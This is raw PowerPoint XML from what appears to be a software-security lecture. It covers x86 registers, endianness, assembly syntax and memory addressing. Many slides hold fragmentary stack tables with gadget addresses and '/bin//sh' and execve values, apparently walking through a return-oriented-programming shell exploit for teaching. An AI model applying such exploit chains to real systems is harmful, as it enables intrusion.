              <a:t>Violate confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140235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1714" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segment registers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to select segments (e.g., code, data, stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program status and control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points to the next instruction to be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot be read or set explicitly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is modified by jump and call/return instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be read by executing a call and checking the value pushed on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Floating point units and mmx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39902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1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1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1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17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17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17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17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17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17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200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="247352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7505579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201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0"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0xbffff61c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9473190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0xbffff628</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202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1733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985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6679071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203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1733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0x080541b2</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679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97483873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204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1359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85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5477072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205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1359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40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3865082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206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9662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939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5731615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mr-IN"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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f</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0x080ea064</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0x6e69622f</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207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="630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0xbffff5ec</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22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027387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208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="64701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0xbffff62c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22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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110951192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209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="611614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24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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966366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292" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Beware of the Endianess </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(and of Signed Integers)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel uses little endian ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x03020100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starting at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40   00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B41   01     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B42   02     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B43   03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed integers are expressed in 2’s complement notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sign is changed by flipping the bits and adding one, ignoring the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-1 is 0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-2 is 0xFFFFFFFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?? is 0xFFFFF826</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having a calculator handy is a good thing...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94064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62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62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62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62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62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629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629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629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629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3629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3629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3629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210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="57621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0x080bb6d7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9711121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211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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8188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4862719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212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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248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5027419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213</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="50345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0xbffff63c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779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0217461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214</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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2256971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8283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42728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19375795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0x080541b2</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42728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9770260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590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91886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199313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0x0809a67f</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0200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91886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7220281"/>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0xbffff64c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367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5550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6330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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Assembly Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Slightly) higher-level language than machine language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program is made of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directives: commands for the assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.data identifies a section with variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions: actual operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x08048f3f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two possible syntaxes, with different ordering of the operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AT&amp;T syntax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, GNU Assembler)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic source, destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOS/Intel syntax (Microsoft Assembler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, IDA Pro)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic destination, source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be set using: set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91496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24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24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24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24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24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24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249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249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0249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0249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0249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024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0x080481ca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58401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1814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2574105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9103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8373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0242479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0x080e4bd2</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1385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4440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156680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0xbffff65c</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46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6961832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0x0806e91b</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7270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69308453"/>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8283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363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4620273"/>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0x080541b2</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363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1399097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4164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9697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7548543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0xbffff668</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0x0807b407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6856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9697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0194169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0xb</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0xbffff690</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0x0807b407</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6856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6302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994420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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory access is composed of width, base, index, scale, and displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Base: starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index: offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scale: Constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displacement: Constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Width: (address suffix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>size of reference (b: byte, s: short, w: word, l: long, q: quad)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address = base + index*scale + displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>displacement(base, index, scale)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x20(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 4), %</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39858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0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0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06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06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06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06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06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06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069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1069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106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0xbffff690</a:t>
            </a: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0xbffff62c</a:t>
            </a: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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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5461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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0807b406</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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080e4bd1</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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080481c9</a:t>
                      </a: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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080541b0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080ea070</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
